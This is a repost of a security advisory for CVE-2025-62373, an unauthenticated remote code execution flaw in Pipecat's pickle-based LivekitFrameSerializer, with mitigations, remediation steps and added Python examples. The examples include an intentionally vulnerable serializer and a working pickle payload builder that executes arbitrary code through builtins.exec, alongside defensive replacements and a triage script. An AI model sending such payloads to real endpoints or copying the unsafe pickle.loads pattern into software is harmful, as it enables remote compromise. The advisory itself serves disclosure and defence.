DEV Community

CVE Reports

Posted on • Originally published at cvereports.com

CVE-2025-62373: Remote Code Execution via Insecure Deserialization in Pipecat LivekitFrameSerializer

Vulnerability ID: CVE-2025-62373
CVSS Score: 9.8
Published: 2026-04-23

CVE-2025-62373 is a critical remote code execution (RCE) vulnerability in Pipecat, an open-source Python framework for building real-time voice and multimodal conversational agents. The flaw originates from the unsafe deserialization of untrusted data using Python's pickle module within the LivekitFrameSerializer class.

TL;DR

A critical insecure deserialization flaw in Pipecat versions 0.0.41 through 0.0.93 allows unauthenticated remote attackers to execute arbitrary Python code by sending malicious pickle payloads to an exposed WebSocket endpoint.
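The pattern behind this advisory, shown as an added example that is not Pipecat's code and not from the original report: a serializer that feeds WebSocket bytes straight into pickle.loads(), a constructed attacker payload whose __reduce__ names builtins.exec so the victim runs arbitrary Python while unpickling, and two replacements. Class and function names (VulnerableFrameSerializer, SafeFrameSerializer, build_payload) are illustrative; the gadget sets an environment variable as a benign stand-in for the os.system("...") an attacker would use.

```python
import builtins
import io
import json
import os
import pickle


class VulnerableFrameSerializer:
    """Illustrative, not Pipecat's class: bytes from the WebSocket go straight
    into pickle.loads(), so the remote sender chooses what runs on load."""

    def deserialize(self, data: bytes):
        return pickle.loads(data)  # CWE-502: attacker-controlled object graph


class MaliciousFrame:
    """Attacker-side object. pickle serialises it through __reduce__; returning
    (builtins.exec, (source,)) makes the victim call exec(source) while the
    stream is loading, before any frame-handling code sees a result."""

    def __init__(self, source: str):
        self.source = source

    def __reduce__(self):
        return (builtins.exec, (self.source,))


def build_payload(source: str) -> bytes:
    """The bytes an unauthenticated client would send to the exposed endpoint."""
    return pickle.dumps(MaliciousFrame(source), protocol=pickle.HIGHEST_PROTOCOL)


DEMO_MARKER = "CVE_2025_62373_DEMO"  # benign stand-in for os.system(...)


def demonstrate_rce() -> bool:
    """True if loading the constructed payload executed attacker-chosen code."""
    os.environ.pop(DEMO_MARKER, None)
    payload = build_payload(f"import os; os.environ['{DEMO_MARKER}'] = 'executed'")
    VulnerableFrameSerializer().deserialize(payload)
    return os.environ.get(DEMO_MARKER) == "executed"


class RestrictedUnpickler(pickle.Unpickler):
    """Interim measure if pickle cannot be removed in one step: refuse every
    global lookup, so only literal data (dict, list, str, bytes, numbers) can
    be rebuilt and no callable is ever resolved from the stream."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class SafeFrameSerializer:
    """The durable fix: a fixed, schema-checked wire format that cannot name
    code. JSON here; the patched project moved to Protocol Buffers, which
    gives the same property."""

    ALLOWED_TYPES = {"audio", "text"}
    MAX_FRAME_BYTES = 1 << 20

    def serialize(self, frame: dict) -> bytes:
        self._validate(frame)
        return json.dumps(frame).encode()

    def deserialize(self, data: bytes) -> dict:
        if len(data) > self.MAX_FRAME_BYTES:
            raise ValueError("frame too large")
        if data[:1] == b"\x80":  # PROTO opcode of pickle protocol 2+: fail loudly
            raise ValueError("pickle stream rejected")
        try:
            frame = json.loads(data)
        except ValueError as exc:  # covers JSONDecodeError and UnicodeDecodeError
            raise ValueError("frame is not valid JSON") from exc
        self._validate(frame)
        return frame

    @classmethod
    def _validate(cls, frame) -> None:
        if not isinstance(frame, dict) or frame.get("type") not in cls.ALLOWED_TYPES:
            raise ValueError("unknown frame type")
        if not isinstance(frame.get("payload"), str):
            raise ValueError("payload must be a string")


def check_defenses(data: bytes) -> dict:
    """Feed the same bytes to both replacements; True means the input was refused."""
    results = {}
    try:
        restricted_loads(data)
        results["restricted"] = False
    except pickle.UnpicklingError:
        results["restricted"] = True
    try:
        SafeFrameSerializer().deserialize(data)
        results["schema"] = False
    except ValueError:
        results["schema"] = True
    return results
```

Running demonstrate_rce() returns True: the code inside the payload executed during pickle.loads(), with no frame handler involved. check_defenses(build_payload("x = 1")) returns {"restricted": True, "schema": True}. The RestrictedUnpickler only blocks global lookups and still lets a sender choose arbitrary nesting depth and size, so treat it as a bridge; the schema-based serializer is the end state.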


⚠️ Exploit Status: POC

Technical Details

  • CVSS Score: 9.8
  • Severity: CRITICAL
  • CWE ID: CWE-502
  • Attack Vector: Network
  • Authentication Required: None
  • CISA KEV Listed: No

Affected Systems

  • Pipecat framework (LivekitFrameSerializer)
  • Applications exposing Pipecat WebSocket endpoints
  • pipecat: >= 0.0.41, <= 0.0.93 (Fixed in: 0.0.94)

Code Analysis

Commit: c1c7a56

Removal of LivekitFrameSerializer to patch insecure deserialization vulnerability

Mitigation Strategies

  • Upgrade Pipecat to version 0.0.94 or later.
  • Migrate from LivekitFrameSerializer to LiveKitTransport for LiveKit integration.
  • Restrict network access to WebSocket endpoints using IP allowlisting.
  • Run the Pipecat application with the lowest possible system privileges.

Remediation Steps:

  1. Identify all Pipecat deployments within the infrastructure.
  2. Update the pipecat-ai dependency to >= 0.0.94 in requirements.txt, pyproject.toml, or the active package manager.
  3. Refactor application code to replace LivekitFrameSerializer with LiveKitTransport.
  4. Deploy the updated application and verify that WebSocket communication uses Protocol Buffers instead of pickled objects.
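A triage helper for steps 1 to 3 above, added here as an example rather than a tool from the advisory or from Pipecat: it checks exact pipecat-ai pins against the affected range and flags source files that still reference LivekitFrameSerializer (which will fail to import after the upgrade, since the class was removed). The requirements text and source snippets are constructed for the demo, and the import paths inside them are assumed, not Pipecat's real module layout.

```python
import re
from importlib import metadata

AFFECTED_MIN = (0, 0, 41)  # advisory: affected >= 0.0.41
AFFECTED_MAX = (0, 0, 93)  # advisory: affected <= 0.0.93
FIXED = (0, 0, 94)

# Matches exact pins such as "pipecat-ai==0.0.88" or "pipecat-ai[silero]==0.0.88".
PIN_RE = re.compile(
    r"^\s*pipecat[-_.]ai\s*(?:\[[^\]]*\])?\s*==\s*([0-9]+(?:\.[0-9]+)*)", re.I
)
USAGE_RE = re.compile(r"\bLivekitFrameSerializer\b")

# Constructed inputs for the demo; paths and module names are assumptions.
SAMPLE_REQUIREMENTS = """\
fastapi==0.115.0
pipecat-ai[silero,livekit]==0.0.88
websockets>=12
"""
SAMPLE_SOURCES = {
    "bot/livekit_ws.py": (
        "from pipecat.serializers.livekit import LivekitFrameSerializer  # assumed path\n"
        "serializer = LivekitFrameSerializer()\n"
    ),
    "bot/transport.py": (
        "from pipecat.transports.services.livekit import LiveKitTransport  # assumed path\n"
    ),
}


def parse_version(text: str) -> tuple:
    return tuple(int(part) for part in text.split("."))


def is_affected(version: str) -> bool:
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def installed_version():
    """Version of the pipecat-ai distribution in this environment, or None."""
    try:
        return metadata.version("pipecat-ai")
    except metadata.PackageNotFoundError:
        return None


def check_requirements(text: str) -> list:
    """Exact pins found for pipecat-ai, each paired with its affected flag.
    Unpinned ranges are not resolved here; use the lock file or pip freeze."""
    found = []
    for line in text.splitlines():
        match = PIN_RE.match(line)
        if match:
            found.append((match.group(1), is_affected(match.group(1))))
    return found


def find_usages(source: str) -> list:
    """1-based line numbers that mention the removed serializer class."""
    return [n for n, line in enumerate(source.splitlines(), 1) if USAGE_RE.search(line)]


def triage(requirements: str, sources: dict) -> dict:
    pins = check_requirements(requirements)
    usages = {path: hits for path, src in sources.items() if (hits := find_usages(src))}
    return {
        "pinned_versions": pins,
        "serializer_usages": usages,
        # An affected pin needs the upgrade; any remaining usage needs the refactor
        # to LiveKitTransport, even on 0.0.94 where the class no longer exists.
        "needs_action": any(bad for _, bad in pins) or bool(usages),
    }
```

On the constructed inputs, triage() reports the 0.0.88 pin as affected and lines 1 and 2 of bot/livekit_ws.py as usages to refactor, so needs_action is True. Point check_requirements at each deployment's requirements.txt or exported lock file and find_usages at its source tree; installed_version() answers the same question for a running environment.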

